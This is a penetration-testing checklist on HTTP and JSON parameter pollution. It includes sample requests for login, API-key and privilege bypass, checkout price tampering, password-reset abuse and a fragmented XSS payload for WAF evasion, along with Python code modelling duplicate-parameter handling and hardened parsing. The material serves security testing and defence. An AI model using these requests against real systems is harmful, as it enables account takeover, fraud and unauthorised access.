HTTP Parameter Pollution

Check List

Methodology

Black Box

Test Query String Pollution

1

To test for server-side parameter pollution (SSPP) in query strings, inject query-syntax characters such as #, & and = into your input (URL-encoded as %23, %26 and %3D so the front end decodes them before forwarding) and observe how the application responds

2

Consider a vulnerable application that searches for users by username. A normal request might look like this

GET /usernameSearch?name=jack&returningPath=/main
3

The front end forwards the name value to an internal API and appends its own parameters. If you submit name=jack%23foo, the decoded # lands unescaped in the internal request

GET /usernames/search?name=jack#foo&publicProfile=true
4

Everything from # onwards is a fragment and is never sent to the internal API, so the query is truncated and publicProfile=true is dropped. If the internal API defaults to returning all profiles when that parameter is absent, non-public profiles are exposed
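The truncation described above, as an added example that is not part of the original page: a Python model of a front end that builds the internal API URL by string concatenation (vulnerable) beside one that percent-encodes the user value first (hardened), with `params_seen_by_backend` showing what the internal API actually parses. The internal host name and all function names are assumptions for illustration.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical internal API base (assumption for illustration only).
INTERNAL_BASE = "http://internal-api/usernames/search"


def build_internal_url_naive(name: str) -> str:
    """Vulnerable: the already-decoded user value is concatenated into the
    internal query string, so '#', '&' and '=' keep their URL meaning."""
    return f"{INTERNAL_BASE}?name={name}&publicProfile=true"


def build_internal_url_safe(name: str) -> str:
    """Hardened: percent-encode the value before embedding it. safe='' makes
    quote() encode '/', '&', '#' and '=' as well, so they become plain data."""
    return f"{INTERNAL_BASE}?name={quote(name, safe='')}&publicProfile=true"


def params_seen_by_backend(url: str) -> dict:
    """What the internal API actually receives: the fragment (everything from
    '#' on) is never transmitted, so urlsplit() separates it out and it is gone."""
    parts = urlsplit(url)
    return parse_qs(parts.query, keep_blank_values=True)


if __name__ == "__main__":
    # The front end receives name=jack%23foo and decodes it to "jack#foo".
    injected = "jack#foo"
    print(params_seen_by_backend(build_internal_url_naive(injected)))
    # -> {'name': ['jack']}   publicProfile=true has been truncated away
    print(params_seen_by_backend(build_internal_url_safe(injected)))
    # -> {'name': ['jack#foo'], 'publicProfile': ['true']}
    # An injected '&' instead adds a competing publicProfile value.
    print(params_seen_by_backend(build_internal_url_naive("jack&publicProfile=false")))
    # -> {'name': ['jack'], 'publicProfile': ['false', 'true']}
```

The `&` case shows why the same probe also matters when nothing is truncated: the internal API now receives two publicProfile values, and which one it honours is exactly the duplicate-parameter question the rest of this page tests.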


Bypassing Authentication

1

Prepare a test login endpoint that accepts username and password parameters

2

Record a normal login request

POST /login
username=admin&password=wrongpassword
3

Send the request with multiple password values

POST /login
username=admin&password=wrongpassword&password=correctpassword
4

Inspect the server response and session behaviour (cookies). If authentication succeeds, the backend processed the last (or some other specific) occurrence of password instead of rejecting the ambiguous request, and HPP is present


Manipulating SQL Queries (Overwriting id)

1

Identify the endpoint that reads id and returns a user profile (e.g., /profile?id=...)

2

Record a normal request and note the response

GET /profile?id=1
3

Send a request with duplicated id parameters and compare the response with the baseline from step 2: if the profile for id 2 is returned, the backend honours the later value; an error that echoes a combined value such as 1,2 shows the duplicates were concatenated into the query

GET /profile?id=1&id=2

Tampering with API Calls (API key parameter)

1

Identify an API endpoint using apikey for authentication (e.g., /api/data?user=123&apikey=...)

2

Record a request with an invalid key and note the rejection response

3

Send a request with multiple apikey parameters where a valid key appears last

GET /api/data?user=123&apikey=invalid-key&apikey=valid-key
4

Check whether access is granted; if it is, the backend used the last occurrence of apikey and HPP is confirmed


Altering Price Calculations (E-commerce)

1

Locate a checkout endpoint that accepts a price parameter from the client (itself a weakness, since the price should be looked up server-side from the product)

2

Record a normal purchase request

POST /checkout
product=123&price=100
3

Send the request with duplicate price values

POST /checkout
product=123&price=100&price=1
4

Verify the server response, cart totals or final calculation; if the last price is applied, resulting in a reduced cost, HPP is present


Bypassing Input Validation and WAF (XSS evasion)

1

Identify a point that reflects or stores user input (e.g., comment parameter)

2

Note a simple blocked input example

comment=<script>alert(1)</script>
3

Split the payload across duplicated parameters so that the WAF inspects each harmless fragment on its own while a backend that concatenates duplicate values reassembles the payload, for example. Whether the reassembled string is syntactically valid depends on the separator the backend joins with (ASP.NET, for instance, joins duplicates with a comma), so confirm the join behaviour first

comment=<scr&comment=ipt>alert(1)</scr&comment=ipt>

HTTP Parameter Pollution (Privilege Escalation)

1

First, identify an endpoint that accepts query parameters, through manual testing or automated tools such as Burp Suite

2

Next, the attacker crafts a request with duplicate parameters or adds unexpected parameters to the URL

https://example.com/api/user?role=admin&role=user
3

In this case, if the application does not reject the duplicated ‘role’ parameter and its access check and its business logic read different occurrences of it, it may grant admin privileges to the user

4

The attacker then analyzes the server’s response to see if the manipulation led to any unexpected behavior. Successful exploitation can result in privilege escalation, information disclosure, or even remote code execution, depending on the application’s logic


Broken Access Control

1

Browse the site with Burp Suite proxying the traffic to map its endpoints and parameters

2

Identify initial API endpoint

GET /api/v1/user/profile?userId=12345 
3

and send a plain request to observe normal server behaviour

4

Check whether you can access another account by adding a second userId parameter as shown below

GET /api/v1/user/profile?userId=12345&userId=67890
5

If this returns an error, keep the value constant but still duplicate the parameter, to tell whether the server rejects duplicates as such or only conflicting values

GET /api/v1/user/profile?userId=12345&userId=12345
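Every duplicate-parameter test above (login, id, apikey, price, the fragmented XSS payload and the userId checks) rests on one question: which occurrence does the backend honour? As an added example that is not part of the original page, the Python below models the three common resolution strategies and a black-box probe that classifies a target by sending two distinctive canaries and seeing which is reflected. The fake targets are constructed stand-ins so the probe runs offline; the framework mapping in the comment is the commonly cited one and should be verified against the actual stack.

```python
from typing import Callable, Dict, List
from urllib.parse import parse_qsl

# Commonly cited duplicate-parameter behaviours (verify against the real stack):
#   first : JSP/Servlet getParameter(), Werkzeug/Flask request.args.get(),
#           Go url.Values.Get()
#   last  : PHP $_GET / $_POST, Django QueryDict["key"]
#   all   : ASP.NET Request.QueryString (joined with ","), Express req.query (array)


def resolve(query: str, strategy: str, sep: str = ",") -> Dict[str, str]:
    """Model what a backend sees for each name after resolving duplicates."""
    seen: Dict[str, List[str]] = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        seen.setdefault(name, []).append(value)
    if strategy == "first":
        return {k: v[0] for k, v in seen.items()}
    if strategy == "last":
        return {k: v[-1] for k, v in seen.items()}
    if strategy == "all":
        return {k: sep.join(v) for k, v in seen.items()}
    raise ValueError(f"unknown strategy {strategy!r}")


def classify_precedence(send: Callable[[str], str], param: str = "id",
                        first: str = "hpp1st", last: str = "hpp2nd") -> str:
    """Black-box probe: send `param` twice with distinctive canaries and infer
    which occurrence the target honours from the canary it reflects."""
    body = send(f"{param}={first}&{param}={last}")
    has_first, has_last = first in body, last in body
    if has_first and has_last:
        return "all"      # concatenated or array-ified: every value reached the app
    if has_last:
        return "last"
    if has_first:
        return "first"
    return "unknown"      # nothing reflected: duplicates rejected or value not echoed


# Constructed stand-ins for targets so the probe runs offline. Against a live
# target pass e.g.  lambda q: requests.get(f"{url}?{q}", timeout=10).text
def fake_php_target(query: str) -> str:
    return "profile for id " + resolve(query, "last")["id"]


def fake_aspnet_target(query: str) -> str:
    return "profile for id " + resolve(query, "all")["id"]


def fake_tomcat_target(query: str) -> str:
    return "profile for id " + resolve(query, "first")["id"]


if __name__ == "__main__":
    for name, target in [("php", fake_php_target), ("aspnet", fake_aspnet_target),
                         ("tomcat", fake_tomcat_target)]:
        print(name, "honours:", classify_precedence(target))
    # What the fragmented XSS payload becomes depends on the join separator.
    print(resolve("comment=<scr&comment=ipt>alert(1)</scr&comment=ipt>", "all"))
    # -> {'comment': '<scr,ipt>alert(1)</scr,ipt>'}   not a valid script tag
```

Run the probe once per parameter of interest before spending time on payloads: a target classified as "first" will never be bypassed by appending a second password or apikey, and a target classified as "all" needs a payload that survives the join separator.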

JSON Parameter Pollution In Export Process

1

Look for endpoints that export data in several formats, for example the following API request

POST /api/admin/exportData
Content-Type: application/json

{"format":"csv","filters":{"userId":12345}}
2

Check how the server responds when the request carries a second format key, for example

{"format":"csv","format":"json"}
3

If the parser rejects the duplicate key with an error such as the one below

{"error":"Unexpected token , in JSON at position 15"}
4

try varying the key's case instead, as shown below, in case the allowlist check and the exporter look the key up differently

{"format":"csv","Format":"json"}
5

A vulnerable server may then respond with the disallowed format

{"status":"processing","file":"/exports/data-2023-10-25.json"}

JSON Parameter Pollution Authentication bypass

1

Perform the authentication flow and intercept its requests

2

If the request carries parameters like the ones below

POST /api/auth/verify
Content-Type: application/json

{"token":"user_token_123","role":"user"}
3

add duplicate keys to the request as shown below

{"token":"user_token_123","token":"admin_token_abc","role":"user","role":"admin"}
4

A vulnerable backend that validates one occurrence but acts on the other might respond

{"authenticated": true, "user": "admin", "permissions": ["read","write","delete"]}

Test Case in Login Parameter

1

Browse the site with Burp Suite proxying the traffic to map its endpoints and parameters

2

Identify initial JSON API endpoint /api/v1/auth/login

3

and send a plain request to observe normal server behaviour

{
    "username": "alice",
    "password": "pass123"
}
4

Test HPP by adding duplicate keys as shown below

{
    "username": "alice",
    "password": "pass123",
    "username": "bob"
}
5

If the server authenticates against the first value but updates or acts on the last (or vice versa), two components disagree about the request. Next, keep the key constant and duplicate a privileged field to check the server's behaviour

{
    "role": "user",
    "role": "admin"
}
6

Test password reset abuse on /api/v1/reset-password: if the reset is authorised against the first username but applied to the last, alice's request resets bob's password

POST /api/v1/reset-password
{
    "username": "alice",
    "new_password": "NewPass123",
    "confirm_password": "NewPass123",
    "username": "bob"
}
7

Test input filter bypass on /api/v1/update-profile: if validation reads one occurrence and storage the other, the filtered payload is persisted

{
    "email": "justanexample@example.com",
    "email": "<script>alert(1)</script>"
}
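The JSON cases above (duplicate format, duplicate token and role, duplicate username, the capitalised Format key) all work because two components parse the same document differently. Added example, not part of the original page: Python's json module silently keeps the last duplicate key, and object_pairs_hook can model a first-wins parser (standing in for a gateway on another stack) or a strict parser that rejects duplicates outright. The gateway/service split, the export allowlist and all function names are assumptions for illustration.

```python
import json
from typing import Any, Dict, List, Tuple

Pairs = List[Tuple[str, Any]]


def first_wins(pairs: Pairs) -> Dict[str, Any]:
    """Model a parser that keeps the FIRST occurrence of a repeated key."""
    out: Dict[str, Any] = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def reject_duplicates(pairs: Pairs) -> Dict[str, Any]:
    """Hardened: refuse documents with repeated keys instead of picking one."""
    out: Dict[str, Any] = {}
    for key, value in pairs:
        if key in out:
            raise ValueError(f"duplicate key {key!r}")
        out[key] = value
    return out


def parse_last_wins(doc: str) -> Dict[str, Any]:
    return json.loads(doc)  # CPython's json: the last occurrence wins silently


def parse_first_wins(doc: str) -> Dict[str, Any]:
    return json.loads(doc, object_pairs_hook=first_wins)


def parse_strict(doc: str) -> Dict[str, Any]:
    return json.loads(doc, object_pairs_hook=reject_duplicates)


def rejects_duplicates(doc: str) -> bool:
    """True if the strict parser refuses the document."""
    try:
        parse_strict(doc)
    except ValueError:
        return True
    return False


def gateway_then_service(doc: str) -> str:
    """Vulnerable pipeline (hypothetical): a first-wins gateway enforces
    role == "user", then a last-wins service acts on whatever role it reads.
    Returns the role the service acts on, or "denied"."""
    if parse_first_wins(doc).get("role") != "user":
        return "denied"
    return str(parse_last_wins(doc).get("role"))


EXPORT_ALLOWLIST = {"csv"}


def export_format_ci(doc: str) -> str:
    """Vulnerable export handler (hypothetical): the allowlist is checked on the
    exact key "format", but the exporter looks the key up case-insensitively and
    keeps the last match, so "Format":"json" slips past the check."""
    data = parse_last_wins(doc)
    if data.get("format") not in EXPORT_ALLOWLIST:
        raise PermissionError("format not allowed")
    chosen = data["format"]
    for key, value in data.items():
        if key.lower() == "format":
            chosen = value
    return str(chosen)


def export_format_safe(doc: str) -> str:
    """Hardened: reject duplicate keys, then reject any key that collides with
    "format" under the same normalisation the exporter uses, and act on the
    exact key that was checked."""
    data = parse_strict(doc)
    lookalikes = [k for k in data if k.lower() == "format" and k != "format"]
    if lookalikes or data.get("format") not in EXPORT_ALLOWLIST:
        raise PermissionError("format not allowed")
    return str(data["format"])


if __name__ == "__main__":
    print(gateway_then_service('{"token":"user_token_123","role":"user","role":"admin"}'))
    # -> admin   the gateway saw "user", the service acted on "admin"
    print(export_format_ci('{"format":"csv","Format":"json"}'))
    # -> json
    print(rejects_duplicates('{"format":"csv","format":"json"}'))
    # -> True
```

The general rule behind both fixes: parse once, reject ambiguity (duplicate keys, case collisions, unknown keys) at that single point, and make every later component act on the exact key the check was made against rather than re-reading the raw document.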

White Box

Cheat Sheet
